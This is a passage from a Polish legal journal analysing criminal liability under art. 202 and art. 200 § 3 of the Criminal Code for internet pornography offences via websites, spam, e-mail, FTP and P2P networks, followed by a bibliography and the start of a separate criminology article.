§ 4a. Kto przechowuje, posiada lub uzyskuje dostęp do treści pornograficznych z
udziałem małoletniego, podlega karze pozbawienia wolności od 3 miesięcy do lat 5.
§ 4b. Kto produkuje, rozpowszechnia, prezentuje, przechowuje lub posiada treści
pornograficzne przedstawiające wytworzony albo przetworzony wizerunek małoletniego
28
F. Radoniewicz, Cyberprzestępstwa przeciwko danym komputerowym i systemom informatycznym w
Kodeksie karnym - propozycje zmian, C.H. Beck, Warszawa 2024, s. 168.
29
F. Radoniewicz, Przeszukanie systemów informatycznych oraz informatycznych nośników danych w
kodeksie postępowania karnego, [w:] Cybersecurity and Law 2022 nr 2, s. 152-153.
30
Ustawa z dnia 6 czerwca 1997 r. – Kodeks karny (t.j. Dz. U. z 2024 r. poz. 17.).
178
uczestniczącego w czynności seksualnej
podlega karze pozbawienia wolności do lat 3.
§ 4c. Karze określonej w § 4b podlega, kto w celu zaspokojenia seksualnego
uczestniczy w prezentacji treści pornograficznych z udziałem małoletniego”,
A nadto w art. 200 § 3 k.k.: :Kto małoletniemu poniżej lat 15 prezentuje treści
pornograficzne lub udostępnia mu przedmioty mające taki charakter albo
rozpowszechnia treści pornograficzne w sposób umożliwiający takiemu małoletniemu
zapoznanie się z nimi, podlega karze pozbawienia wolności do lat 3
31
”.
Przed przejściem do omówienia znamion muszę zaznaczyć, że z uwagi na
ograniczenia objętościowe skupię się na znamionach czasownikowych, w kwestii
pozostałych odsyłając do innych publikacji.
Przez ‘produkowanie” należy rozumieć działania prowadzące do wytworzenia
„treści pornograficznej”. Utrwalenie to zarejestrowanie określonych treści na
odpowiednim nośniku materialnym. Istotą „utrwalenia” jest przede wszystkim
możliwość jego późniejszego odtworzenia
32
. Uważam, że przy wyjaśnieniu znaczenia
pojęcia „posiadanie” należy sięgnąć do znaczenia tego terminu na gruncie prawa
cywilnego, dokonując jednak zasadniczej modyfikacji jego zakresu. – ograniczając je do
tzw. posiadania samoistnego, czyli władania rzeczą jak właściciel, a zatem wyłączając
tzw. posiadanie zależne, czyli dzierżenie rzeczą jak użytkownik, zastawnik, najemca,
dzierżawca lub mający inne prawo, z którym łączy się określone władztwo nad cudzą
rzeczą. Do tej kategorii według mnie należeć będzie inne znamię z omawianego przepisu
– przechowywanie
33
.
Ciekawa kwestia wiąże się z pojęciem sprowadzania. Z pewnością nie można
ograniczyć zakresu tego pojęcia do sprowadzania w sensie potocznym – czyli
sprawodzania z zagranicy. Czynność ta może w całości odbywać się na terenie kraju.
Przede wszystkim jednak należy przyjąć, że mieści się w nim sprowadzanie za
pośrednictwem Internetu.( Takie stanowisko przyjmują np. Marek Bielski
34
i Marek
Mozgawa
35
. Dodatkowym uzasadnieniem takiego rozumienia jest fakt, że stanowisko
przeciwne oznaczałoby depenalizację przesyłania treści pornograficznych z za
pośrednictwem Internetu z uwagi na brak odpowiedniego znamienia. Natomiast pojęcie
rozpowszechniania oznacza udostępnianie treści pornograficznych nieokreślonemu
kręgowi odbiorców, obojętne czy odpłatnie, czy pod tytułem darmowym.
W piśmiennictwie i judykaturze panuje zgoda, że umieszczenie w internecie treści
o charakterze pornograficznym należy uznać za ich rozpowszechnianie. Kontrowersje
natomiast dotyczą uznania takiej czynności za „prezentowanie” oraz „publiczne
prezentowanie”.
Przyjąć należy, że nie ma generalnej zasady w tej kwestii. Zależy to bowiem od
tego, jaka usług sieciowa zostanie przez sprawcę użyta, celem wprowadzić tych treści do
internetu. W pierwszej kolejności odniosę się do najpopularniejszej z nich – usługi www.
31
Przepis ten pierwotnie znajdował się w przytoczonym wyżej art. 202, jako jego § 2. Przewidywał jednak
niższą sankcję - grzywnę, karę ograniczenia wolności albo pozbawienia wolności do lat 2. Art. 1 pkt 4 lit. b
ustawy z dnia 4 kwietnia 2014 r. (t.j. Dz.U.z 2014 poz.538)
32
M. Mozgawa [w:] M. Budyn-Kulik, P. Kozłowska-Kalisz, M. Kulik, M. Mozgawa, Kodeks karny.
Komentarz aktualizowany, LEX/el. 2024, art. 202.
33
M. Bielski [w:] Kodeks karny. Część szczególna. Tom II. Część I. Komentarz do art. 117-211a , red. W.
Wróbel, A. Zoll, Warszawa 2017, art. 202.
34
M. Bielski [w:] Kodeks karny…. art. 202.
35
M. Mozgawa [w:], Kodeks karny…, art. 202
179
Przez „prezentowanie” rozumie się „wszelkie sposoby umożliwienia odbioru
treści o charakterze pornograficznym, tj. pokazywanie, wystawianie na widok,
zapoznawanie, zaznajamianie, udostępnianie”
36
. W związku z tym karalne jest już samo
prezentowanie treści pornograficznych przedstawiających wytworzony albo
przetworzony wizerunek małoletniego uczestniczącego w czynności seksualnej (art. 202
§ 4b k.k.).
Z kolei o publicznym charakterze prezentacji przesądza albo miejsce jej
dokonania, albo jej odbiór (a także sama możliwość odbioru) przez grupę
niezindywidualizowanych osób bądź przez oznaczoną, ale większą liczbę osób
37
. Moim
zdaniem umieszczanie treści pornograficznych w internecie za pośrednictwem usługi
www (tj. na witrynie internetowej) stanowi tak pojętą prezentację – określone materiały
zostają udostępnione nieograniczonej liczbie użytkowników, mogącym się z nimi
zapoznać (w rzeczywistości i potencjalnie). Ewentualny kontrargument, zgodnie z
którym z treścią o charakterze pornograficznym zetknąć się może w sieci nie każdy, ale
ten tylko, kto zada sobie trud wyszukania odpowiedniej witryny
38
– jest moim zdaniem
błędny - myli się w tym wypadku dwa pojęcia: publiczności prezentacji z narzucaniem
treści. Kontrowersyjną kwestią jest ponadto kwalifikacja czynności polegającej na
umieszczeniu na stronie samych linków do stron pornograficznych. Oczywiście w
żadnym wypadku nie jest to „prezentowanie” jakichkolwiek treści. Natomiast dokonując
oceny, czy jest to rozpowszechnianie, należy rozróżnić dwie sytuacje: gdy sprawca
umieszcza link do swojej strony (tzn. strony, której jest autorem lub wydawcą) oraz gdy
umieszcza link do strony cudzej. Należy przyjąć, że w pierwszym przypadku mamy do
czynienia z rozpowszechnianiem, w drugim – z pomocnictwem do rozpowszechniania.
Niekiedy zdarza się, że użytkownik internetu trafia na witrynę zawierającą treści
pornograficzne, mimo że wcale nie miał takiego zamiaru. Może to być wynikiem
podstępu osoby trzeciej. Najbardziej finezyjnym fortelem, mającym do tego
doprowadzić, jest zatrucie (oszukanie) systemu nazw domen (tzw. DNS), którego
zadaniem jest odwzorowywanie mnemonicznych (tj. „zrozumiałych” dla człowieka)
nazw domen na odpowiednie adresy IP (tj. „zrozumiałe” dla urządzeń sieciowych. W
przypadku zastąpienia w serwerze DNS prawidłowych adresów IP innymi, użytkownik,
wpisując nazwę witryny, do której chce uzyskać dostęp, trafi na zupełnie inną
39
.
Inną metodą umożliwiającą skierowanie nieświadomego użytkownika na witrynę,
na której znajdują się materiały pornograficzne jest posłużenie się wprowadzającymi w
błąd metatagów (są to słowa-klucze, charakteryzujące daną stronę internetową; w oparciu
o które wyszukiwarki internetowe uzyskują dane o zawartości strony, szukając stron
spełniających kryteria określone przez korzystającego z nich użytkownika). W
metatagach stron pornograficznych w celu zmylenia przeglądarek i użytkowników co do
zawartości strony (zakwalifikowania strony jako neutralnej – niezawierającej materiałów
obscenicznych) znajdują się zwykle np. nazwiska gwiazd filmu, muzyki czy
celebrytów
40
.
36
M. Mozgawa [w:] Kodeks karny…. art. 202 k.k.
37
L. Gardocki, Prawo karne, Warszawa 2009, s. 304; M. Mozgawa [w:] M. Mozgawa (red.), Kodeks karny..,
art. 202
38
Zob. M. Berent, M. Filar [w:] Kodeks karny. art. 202; A. Marek, Kodeks karny, Warszawa 2010, s. 463.
39
F. Radoniewicz, Odpowiedzialność karna…, s. 94,
40
F. Radoniewicz , Pornografia w Internecie – zagadnienia wybrane [w:] Pornografia, red. M. Mozgawa,
Wolters Kluwer, Warszawa 2011, s. 226.
180
Wyżej opisane sytuacje powinno się zakwalifikować jako przestępstwo z art. 202
§ 1 k.k., czyli narzucenie odbioru treści pornograficznych osobie, która sobie tego nie
życzy, a jeżeli ofiara jest małoletnim poniżej lat 15 – z art. 200 § 3 k.k. Oczywiście, jeżeli
są to materiały będące twardą pornografią, nastąpi realizacja znamion przestępstw z art.
202 § 3 k.k. lub art. 202 § 4b k.k.
Interesującym zagadnieniem jest kwestia przeglądania przez użytkownika witryn
zawierających tzw. twardą pornografię.
41
, bez jednoczesnego jej pobierania, którego
jednak – nie uniknie. Proces ten zachodzi bowiem automatycznie – kopie odwiedzanych
witryn są zapisywane jako pliki tymczasowe na dysku twardym
42
. Spotkać się można ze
stanowiskiem, że ze względu na ów automatyzm tego procesu oraz fakt, że odbywa się
on z wyłączeniem woli użytkownika, nie sposób przypisać mu czynu z art.. 202 § 3 k.k.
Przyjęcie stanowiska przeciwnego byłoby nadmiernym rozszerzeniem kryminalizacji
43
,
sprzecznym z zasadą nullum crimen sine lege
44
, Nie zgadzam się z tym – obecnie
przeciętny użytkownik zdaje sobie sprawę ze wspomnianego procesu – choćby, dlatego,
że usuwanie plików tymczasowych stanowi jedną z czynności składających się na
„komputerową higienę”. Stąd zapisywanie zawartości stron jako pliki tymczasowe należy
uznać co najmniej za „przechowywanie”. Natomiast możliwość przypisania sprawcy
odpowiedzialności z art. 202 § 3 k.k. wyłącza brak celu jego działania s w postaci
rozpowszechniania. Zaznaczyć jednak, że w przypadku treści pornograficzne z udziałem
małoletniego może on odpowiadać na podstawie art. 202 § 4a przewidującego
odpowiedzialność karną za ich przechowywanie, posiadanie, a także uzyskiwaniu
dostępu - co może polegać właśnie na przeglądaniu witryn internetowych).. Natomiast w
sytuacji, gdy produkuje, rozpowszechnia, prezentuje, przechowuje lub posiada to treści
pornograficzne przedstawiające wytworzony albo przetworzony wizerunek małoletniego
uczestniczącego w czynności seksualnej sprawcę można pociągnąć do odpowiedzialności
karnej na podstawie art. 202 § 4b k.k. W tym wypadku możliwe jest przyjęcie, że
przeglądanie stron internetowych stanowi realizację znamienia przechowuje.
Spam, mimo że wysłany jest na określoną liczbę skrzynek pocztowych, trafia
jednak do nieokreślonej liczby odbiorców. Wynikać to może – przykładowo – stąd, że
użytkownikami jednego konta może być więcej osób (np. małżeństwo) lub wśród
adresów może być adres listy mailingowej (czego rezultatem będzie automatyczne
przekazanie takiej wiadomości na konta wszystkich osób wpisanych na daną listę). W
związku z powyższym uważam, że należałoby rozważyć możliwość uznania takiego
zachowania za rozpowszechnianie oraz publiczne prezentowanie
45
. Konsekwencją takiej
41
Twarda pornografia (tzw. hard core)- pornografia dziecięca, związana z prezentowaniem przemocy albo
posługiwaniem się zwierzęciem).
42
Por. K. Gienas, Pseudopornografia dziecięca oraz posiadanie treści pornograficznych z udziałem
małoletnich z punktu widzenia funkcjonowania Internetu – dylematy ustawodawcy (w:) J. Kosiński (red.),
Przestępczość teleinformatyczna. VII seminarium naukowe. Materiały seminaryjne, Szczytno 2004, s. 53.
43
Odmiennie należy traktować przeglądanie stron internetowych w trybie offline, czyli pobieranie zawartości
strony na dysk twardy za pomocą specjalnego programu (np. Teleport Pro) i przeglądanie jej po odłączeniu
się od sieci. Zob. K. Gienas, Pseudopornografia dziecięca…, s. 53–54.
44
Tak też uważa Marian Filar, który rozważał tę kwestię w kontekście „sprowadzania”. Zob. M. Filar (w:) M.
Filar (red.), Kodekskarny ..., s. 839–840.
45
Podobnie uważa Barbara Kunicka-Michalska (B. Kunicka-Michalska, Przestępstwa przeciwko wolności
seksualnej i obyczajności popełniane za pośrednictwem systemu informatycznego, Wrocław 2004, s. 90.
Przeciwnego zdania są: Andrzej Adamski (A. Adamski, Karnoprawna ochrona dziecka w sieci Internet,
Prok. i Pr. 2003, nr 9, s. 72) oraz Piotr Waglowski, który jednocześnie postuluje zmianę treści przepisu art.
181
kwalifikacji rozsyłania spamu byłaby możliwość postawienia sprawcy zarzutów
popełnienia przestępstw z art. 202 § 3 lub art. 202 § 4b oraz art. 202 § 1 k.k., w zależności
od spełnienia dodatkowych warunków - charakteru treści (twarda pornografia) oraz cech
odbiorcy (małoletni poniżej 15 roku życia)
46
Oczywiście warunkiem przyjęcia, że działania osoby wysyłającej spam stanowi
„narzucenie odbioru” jest brak w e-mailach jakichkolwiek oznak mogących wskazywać
na jej zawartość (tematu lub nazwy nadawcy mogących świadczyć o jej treści). W
przeciwnym razie odbiorca chcący uniknąć kontaktu z treściami pornograficznymi
zawartymi w jej treści, powinien po prostu skasować taką wiadomość bez jej
przeglądania
47
.
Wysyłanie spamu stanowi prezentację treści pornograficznych małoletniemu
poniżej lat 15 albo rozpowszechnianiem w sposób umożliwiający takiej osobie
zapoznanie się z nimi (art. 200 § 3), jeżeli taka osoba stanie się odbiorcą takiej
wiadomości. Czynu tego można bowiem dopuścić się w zamiarze ewentualnym, a spamer
wysyłający e-maile na nieokreśloną liczbę adresów e-mail musi liczyć się z faktem, że
odbiorcami mogą stać się osoby małoletnie poniżej lat 15
48
.
Zgodnie z przepisem art. 24 ustawy o świadczeniu usług drogą elektroniczną
49
rozsyłanie spamu o charakterze komercyjnym (niezamówionych informacji handlowych)
jest wykroczeniem zagrożonym karą grzywny
50
, ściganym na wniosek pokrzywdzonego.
W związku z tym sprawca rozsyłający spam pornograficzny popełnia wykroczenie tylko
w wypadku, gdy jednocześnie ma on charakter komercyjny (np. jest reklamą płatnego
internetowego serwisu pornograficznego).
Nie stanowi rozpowszechniania materiałów o charakterze pornograficznych ich
wymiana przy użyciu poczty elektronicznej (np. w ramach „siatki” pedofilów), gdyż –
jak trafnie wskazuje Andrzej Adamski – przebiega to w kręgu zamkniętej grupy osób
wzajemnie się znających, (a w związku z tym określonych i konkretnych
51
. Bez
wątpienia, jeżeli użytkownik wysyła lub odbiera wiadomości e-mail zawierające
nielegalne treści pornograficzne, oznacza to, że je posiada i przechowuje. Jeżeli więc
czyni to z zamiarem dalszego ich rozpowszechniania, a jest to twarda pornografia, swoim
zachowaniem realizuje znamiona czynu zabronionego z art. 202 § 3 k.k. Natomiast w
202 § 1 poprzez takie doprecyzowanie jego treści, by kryminalizował on prezentowanie treści
pornograficznych w taki sposób, że każdy może mieć do nich dostęp (choć jednocześnie uważa, że takie
sformułowanie mogłoby rodzić ryzyko nadinterpretacji) albo taką jego zmianę, by penalizowane było już
samo narzucenie odbioru treści pornograficznych (P. Waglowski, Spam ofensywny seksualnie (w:) J.
Kosiński (red.), Przestępczość teleinformatyczna. VII seminarium naukowe. Materiały seminaryjne,
Szczytno 2004, s. 90–92).
46
F. Radoniewicz, Cyberprzestępstwa przeciwko…, s. 139 i n.
47
M. Rodzynkiewicz [w:] A. Barczak-Oplustil, G. Bogdan, Z. Ćwiąkalski, M. Dąbrowska-Kardas, P. Kardas,
J. Majewski, J. Raglewski, M. Rodzynkiewicz, M. Szewczyk, W. Wróbel, A. Zoll, Kodeks karny. Część
szczególna. Tom II. Komentarz do art. 117–277k.k., Zakamycze 2006, s. 674.
48
Podobnie uważa Piotr Waglowski (P. Waglowski, Spam..., s. 92). Wydaje się, że zbliżone stanowisko
prezentuje Andrzej Adamski (A. Adamski, Karnoprawna ochrona..., s. 72–73).
49
Ustawa z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (t.j. Dz. U. z 2020 r. poz. 344)..
50
Zgodnie z przepisem art. 24 § 2 Kodeksu wykroczeń (ustawa z dnia 21 maja 1971 r. – Kodeks wykroczeń,
Dz. U. z 2023 r. poz. 2119) grzywna wymierzana jest w wysokości od 20 do 5000 zł, chyba że ustawa
stanowi inaczej. Natomiast jak wskazuje R. Ibbotson, ustawodawstwa innych państw europejskich
przewidują surowsze sankcje, np. w Wielkiej Brytanii jest nią grzywna w wysokości do 5000 funtów, a we
Włoszech kara pozbawienia wolności do lat trzech (R. Ibbotson, Kontrolowanie spamu. Kontrola i ochrona,
Linux Magazine 2004, nr 3, s. 46).
51
Por. A. Adamski, Cyberprzestępczość – aspekty prawne i kryminologiczne, Studia Prawnicze 2005, nr 4, s.
66–67.
182
przypadku, gdy są to materiały pornograficzne z udziałem małoletniego poniżej lat 15 lub
przedstawiające wytworzony albo przetworzony wizerunek małoletniego
uczestniczącego w czynności seksualnej, może odpowiadać karnie, nawet jeżeli posiada
je lub przechowuje jedynie na własny użytek (art. 202 § 4a lub art. 202 § 4b k.k.).
Podobnie nie może być uznane za publiczną prezentację treści pornograficznych
w sposób narzucający odbiór innej osobie (art. 202 § 1 k.k.) wysłanie przez użytkownika
wiadomości e-mail zawierającej treści pornograficzne do innego użytkownika
(użytkowników) np. jako zniewagi czy po prostu dla żartu, gdyż nie zostaje spełniona
przesłanka publicznego charakteru tejże „prezentacji” (działanie sprawcy skierowane jest
przeciw konkretnej osobie). Jeżeli jednak odbiorca e-maila będzie osobą małoletnią
poniżej lat 15, sprawca wypełni znamiona przestępstwa z art. 200 § 3 k.k.
Z zachowaniami użytkowników dotyczącymi treści pornograficznych spotkać się
można zarówno w grupach dyskusyjnych (rozsyłanie maili zawierających takie materiały,
na czatach i forach (np. umieszczanie zdjęć czy linków). Ocena czynów z pierwszej grupy
będzie analogiczna jak w przypadku posługiwania się przez sprawcę pocztą
elektroniczną. Do tej drugiej natomiast odnieść należy uwagi dotyczące użycia usługi
www, z tą różnicą jednak, że w przypadku forów czy czatów o charakterze prywatnym
nie jest możliwe – co zdaje się oczywistym – dopuścić się czynu publicznej prezentacji.
Dokonując oceny czy znamiona czynu zabronionego z art. 202 § 1 zostały
zrealizowane, należy wziąć pod uwagę charakter danej grupy użytkowników, skupionych
na danym czacie, forum, liście dyskusyjnej. Jeżeli okaże się, że ich przedmiotem
zainteresowania jest właśnie pornografia, to oczywiście o jakimkolwiek narzucaniu
odbioru nie ma mowy
52
.
Analogicznie, jak w przypadku poczty elektronicznej, przedstawia się sytuacja w
kwestii wykorzystania komunikatorów internetowych do popełniania przestępstw
pornograficznych. Można zatem do tego zagadnienia odnieść powyższe rozważania.
Serwery ftp często są wyspecjalizowane w gromadzeniu danych o określonej
tematyce, bywa, że są to treści o charakterze pornograficznym. Osoba umieszczająca je
na serwerze ftp dopuszcza się ich rozpowszechniania, jeśli są to treści, które stanowią
twardą pornografię, to w zależności od ich rodzaju popełnia czyn zabroniony określony
w art. 202 § 3 k.k. w przypadku ,gdy są to treści z pornograficzne z udziałem małoletniego
albo związane z prezentowaniem przemocy lub posługiwaniem się zwierzęciem, lub art.
202 § 4b k.k. jeżeli są to treści pornograficzne przedstawiające wytworzony lub
przetworzony wizerunek małoletniego uczestniczącego w czynności seksualnej.
Zachowanie osoby pobierającej owe materiały wypełnia znamiona czynu zabronionego z
art. 202 § 3 k.k., tj. sprowadzania twardej pornografii, o ile czyni to w celu dalszego ich
rozpowszechniania. W przypadku, gdy sprawca sprowadza owe materiały wyłącznie na
własny użytek, popełnia przestępstwo wyłącznie w wypadku, gdy przedstawiają one
małoletniego poniżej 15 lat (art. 202 § 4a k.k.). Zauważyć przy tym wypada, że
jakkolwiek sprowadzanie nie należy do znamion przestępstwa z art. 202 § 4b k.k., to
przepis ten – w analogicznych przypadkach, tj. przy transferze danych z serwera –
znajdzie zastosowanie do materiałów pornograficznych przedstawiających wytworzony
lub przetworzony wizerunek małoletniego uczestniczącego w czynności seksualnej.
Pobranie bowiem danych wiąże się z objęciem ich przez użytkownika w posiadanie, takie
zaś zachowanie realizuje znamiona przestępstwa z art. 202 § 4b kk (podobnie zresztą jak
art. 202 § 4a kk).
52
Por. P. Waglowski, Spam ofensywny..., s. 91–92.
183
Uważam, że nie można uznać umieszczenia treści pornograficznych na serwerze
ftp za ich publiczną prezentację. Wynika to stąd, że zawartość serwera może być
przeglądana jedynie jako indeks plików. Bezpośrednią styczność z ich treścią użytkownik
będzie miał dopiero po pobraniu ich na swój komputer.
Bardzo interesujący problem stanowi kwestia ewentualnej odpowiedzialności
karnej osób korzystających z sieci p2p. W przypadku, gdy pobiera ona materiały będące
twardą pornografią, to zachodzi sytuacja analogiczna jak w przypadku pobierania takich
treści z serwera ftp – jej zachowanie należy zakwalifikować jako sprowadzanie treści
pornograficznych – o ile oczywiście działa w celu ich rozpowszechniania (art. 202 § 3
k.k.). Natomiast gdy są to materiały pornograficzne z udziałem małoletniego poniżej lat
15 – również w sytuacji, gdy sprowadza je ty;lko na własny użytek (art. 202 § 4a k.k.).
Ponieważ rezultatem pobierania jest w wejście w posiadanie, zachowanie użytkownika
może (w zależności od charakteru pobieranych materiałów) realizować znamiona czynów
zabronionych odpowiednio z art. 202 § 4a lub art. 202 § 4b k.k.
Jak wcześniej już wspominano, ze specyfiki funkcjonowania sieci p2p,, sprawca
pobierający z Internetu pliki przy jej pomocy, zawsze jednocześnie je rozpowszechnia,
gdyż by móc w miarę komfortowo pobierać pliki, musi je udostępnić innym
użytkownikom swoje zasoby. Jeśli wśród nich znajdują się zakazane materiały
pornograficzne, to sprawca dopuszcza się ich rozpowszechniania, jako że udostępnia je
nieokreślonej liczbie osób. Jeżeli nawet natychmiast przeniesie treści o charakterze
pornograficznym do nieudostępnionego innym użytkownikom sieci folderu, to w
dalszym ciągu udostępnia te pliki, które są przez niego pobierane. Należy przyjąć, że
trudno sobie wyobrazić, że osoba korzystająca z sieci p2p nie znała podstawowych
mechanizmów jej działania. Jeżeli zatem pobiera ona materiały o charakterze
pornograficznym, które zaliczane są do twardej pornografii, to co najmniej godzi się na
to, że jednocześnie (tj. w trakcie pobierania) będzie je rozpowszechniać (dla
przypomnienia – rozpowszechniania można się dopuścić w zamiarze bezpośrednim i
ewentualnym). Dlatego też, w zależności od charakteru pobieranych treści w omawianej
przestawionej sytuacji zachowanie sprawcy realizuje znamiona czynu zabronionego z art.
202 § 3 k.k. lub art. 202 § 4b k.k. Analogicznie jednak jak w przypadku serwerów ftp
zbyt dalekim rozszerzeniem kryminalizacji stanowiłoby przyjęcie, że udostępnienie
plików przy użyciu sieci p2p jest publiczną prezentacją – gdyż to użytkownik wybiera
plik, który następnie pobiera, wybierając go z listy, na podstawie nazwy. Jego prawdziwą
treść poznaje dopiero po zakończeniu procesu pobierania, ewentualnie już w jego trakcie
pobierania, jeżeli możliwy jest podgląd zawartości
53
.
Zakończenie
Internet, stał się głównym medium służącym do popełniania przestępstw
związanych z pornografią. Jak wskazano we wstępie o tym „sukcesie” zadecydował
szereg czynników: globalny zasięg tego medium, łatwość umieszczaniu wszelkiego
rodzaju treści oraz uzyskiwaniu do niej dostępu (w większości wypadków nieodpłatnie),
przekonanie (często iluzoryczne) sprawców i użytkowników o ich anonimowości i
wiążące się z tym poczucie bezkarności. Postęp techniczny powoduje ponadto, że
korzystanie z internetu stało się bardzo łatwe - intuicyjne i niewymagające specjalnych
umiejętności. Ustawodawca oczywiście nie nadąża za zmianami – polska regulacja nie
jest przygotowana do walki z przestępczością internetową. W czasie tworzenia kodeksu
53
F. Radoniewicz, Pornografia w Internecie…, s. 251-253.
184
karnego internet był słabo-dostępnym luksusem, a obsługa komputera była dość trudna.
W szczególności świadczy o tym terminologia, która niezbyt nadaje się do zastosowania
w środowisku cyfrowym.
Bibliografia
1. Adamski, A. Karnoprawna ochrona dziecka w sieci Internet, Prok. i Pr. 2003, nr
9
2. Adamski A., Cyberprzestępczość – aspekty prawne i kryminologiczne, Studia
Prawnicze 2005, nr 4
3. Berent M., Filar M.[w:] J. Bojarski, M. Bojarski, P. Czarnecki, W. Filipkowski,
O. Górniok, E. M. Guzik-Makaruk, S. Hoc, P. Hofmański, M. Kalitowski, M.
Kulik, L. K. Paprzycki, E. W. Pływaczewski, W. Radecki, A. Sakowicz, Z.
Siwik, B. J. Stefańska, R. A. Stefański, L. Tyszkiewicz, A. Wąsek, L. Wilk, M.
Filar, M. Berent, Kodeks karny. Komentarz, wyd. V, Warszawa 2016, art. 202.
4. Bartkiewicz W.[w:] J. Papińska-Kacperek (red.), Społeczeństwo informacyjne,
Warszawa 2008,
5. Bielski M. [w:] Kodeks karny. Część szczególna. Tom II. Część I. Komentarz
do art. 117-211a , red. W. Wróbel, A. Zoll, Warszawa 2017, art. 202
6. Dołowski, Analiza właściwości mechanizmów peer-to-peer [w:] D.J. Bem (red.),
Internet 2008, Wrocław 2009
7. Gardocki L., Prawo karne, Warszawa 2009
8. Gienas K., Pseudopornografia dziecięca oraz posiadanie treści
pornograficznych z udziałem małoletnich z punktu widzenia funkcjonowania
Internetu – dylematy ustawodawcy (w:) J. Kosiński (red.), Przestępczość
teleinformatyczna. VII seminarium naukowe. Materiały seminaryjne, Szczytno
2004
9. Gołaczyński J, Umowy elektroniczne w prawie prywatnym międzynarodowym,
Warszawa, Kraków 2007
10. Grabowski L., Dobrzyński K., Wykorzystanie właściwości aplikacji DC++
(V0.691) pracującej w sieciach direct connect do identyfikacji użytkowników –
studium przypadku [w:] J. Kosiński (red.), Przestępczość teleinformatyczna: IX
seminarium naukowe: materiały seminaryjne, Szczytno 2006
11. Gramatyka M, Piractwo komputerowe – sieci peer-to-peer i walka z efektami ich
działania [w:] J. Widła (red.), Wokół problematyki dokumentu: Księga
pamiątkowa dedykowana Profesorowi Antoniemu Felusiowi, Katowice 2005,
12. Ibbotson R., Kontrolowanie spamu. Kontrola i ochrona, Linux Magazine 2004,
nr 3,
13. Jarski M., Efektywne metody analizy treści internetowych [w:] J. Kosiński (red.),
Przestępczość teleinformatyczna. VII seminarium naukowe. Materiały
seminaryjne, Szczytno 2004
14. Kasprzak A., Walkowiak K. Ewolucja sieci Internet [w:] D.J. Bem (red.) Internet
2008, Wrocław 2009
15. Kunicka-Michalska B., Przestępstwa przeciwko wolności seksualnej i
obyczajności popełniane za pośrednictwem systemu informatycznego, Wrocław
2004
16. Lech P., Podgórski G. [w:] J. Papińska-Kasperek, Społeczeństwo informacyjne,
Warszawa 2008,
17. Leszczyński T.Z., Nieuprawniony dostęp do ftp [w:] J. Kosiński (red.),
185
Przestępczość teleinformatyczna, Szczytno 2009
18. Mozgawa M. [w:] M. Budyn-Kulik, P. Kozłowska-Kalisz, M. Kulik, M.
Mozgawa, Kodeks karny. Komentarz aktualizowany, LEX/el. 2024, art. 202.
19. Muszyński J. [w:] J. Chustecki et al., Vademecum teleinformatyka, Warszawa
1999
20. Pałys M, Szymanowski M., Rozwój sieci Internet – stan obecny, kierunki i
prognoza rozwoju [w:[ Internet 2006, Wrocław 2007
21. Radoniewicz F., Cyberprzestępstwa przeciwko danym komputerowym i
systemom informatycznym w kodeksie karnym - propozycje zmian, C.H. Beck,
Warszawa 2024
22. Radoniewicz F., Odpowiedzialność karna za hacking i inne przestępstwa
przeciwko bezpieczeństwu danych komputerowych i systemów informatycznych,
Wolters Kluwer, Warszawa 2016
23. Radoniewicz F., Pornografia w Internecie – zagadnienia wybrane [w:]
Pornografia, red. M. Mozgawa, Wolters Kluwer, Warszawa 2011
24. Radoniewicz F., Przeszukanie systemów informatycznych oraz informatycznych
nośników danych w kodeksie postępowania karnego, [w:] Cybersecurity and
Law 2022, nr 2
25. Rodzynkiewicz [w:] A. Barczak-Oplustil, G. Bogdan, Z. Ćwiąkalski, M.
Dąbrowska-Kardas, P. Kardas, J. Majewski, J. Raglewski, M. Rodzynkiewicz,
M. Szewczyk, W. Wróbel, A. Zoll, Kodeks karny. Część szczególna. Tom II.
Komentarz do art. 117–277k.k., Zakamycze 2006,
26. Trzaska M., Pedofilia i treści zawierające pornografię dziecięcą w grupach
dyskusyjnych [w:] J. Kosiński (red.), Przestępczość teleinformatyczna. VII
seminarium naukowe. Materiały seminaryjne, Szczytno 2004
27. Waglowski P., Spam ofensywny seksualnie [w:] J. Kosiński (red.), Przestępczość
teleinformatyczna. VII seminarium naukowe. Materiały seminaryjne, Szczytno
2004
28. Warylewski J.K., Pornografia - próba definicji [w:] Pornografia, red. M.
Mozgawa, Warszawa 2011.
29. Warylewski J. K., Pornografia dziecięca w świetle prawa krajowego,
międzynarodowego i unijnego, Państwo i Prawo 2019, nr 9
186
KRYMINOLOGIA JAKO NAUKA O SOBIE
CRIMINOLOGY AS A STUDY OF YOURSELF
dr Roman KASZUBOWSKI
1
Akademia Kaliska im. Prezydenta Stanisława Wojciechowskiego
Instytut Nauk o Bezpieczeństwie
Streszczenie
Autor opracowania akcentuje potrzebę oraz stara się przedstawić konieczność
postrzegania współczesnej kryminologii w kontekście nieuchronnych i dynamicznych
przemian w obrębie uwarunkowań przestępczości, co związane jest z pojawianiem się
nowych form i odmian zachowań bezprawnych. Szczególny akcent dotyczy roli i udziału
jednostki, tak w kształtowaniu postaw prospołecznych, jak i w przejawianiu
indywidualnych zachowań patologicznych. Bardzo istotnym obszarem staje się
przedstawienie praktycznych relacji kryminologii z innymi dziedzinami i obszarami nauk
humanistycznych, szczególnie psychologii, socjologii oraz pedagogiki. Zakres
tematyczny dotyczy aspektów rozwoju ontologicznego oraz nieustannie zachodzących
zmian w obszarach psychofizycznych organizmu człowieka, jako jednostki społecznej,
które w znaczącej mierze wywołują konflikty jednostki ze społeczeństwem i z
obowiązującym systemem normatywnym.
Słowa kluczowe: kryminologia, zaburzenia w zachowaniu, agresja, nieprzystosowanie
społeczne, osobowość, pedagogika, socjologia, psychologia.
Summary
The author of the study tries to present the need to perceive contemporary criminology in
the context of inevitable and dynamic changes within the conditions of crime, which is
associated with the emergence of new forms and varieties of unlawful behavior. Particular
emphasis concerns the role and participation of the individual, both in shaping pro-social
attitudes and in the manifestation of individual pathological behaviors. A very important
area is the presentation of practical relations of criminology with other fields and areas of
humanities, especially psychology, sociology and pedagogy. The thematic scope concerns
aspects of ontological development and constant changes in the psychophysical areas of
the human body as a social unit, which to a large extent cause conflicts of the individual
with society and with the applicable normative system.
Keywords: criminology, behavioral disorders, aggression, social maladjustment,
personality, pedagogy, sociology, psychology.
1
ORCID: 0000-0002-7892-5498
187
Wprowadzenie
Tradycyjne postrzeganie przedmiotu zainteresowania kryminologii, jako nauki o
przestępstwie, nauki o czynniku genetycznym przestępstwa, czy też nauki o strukturze,
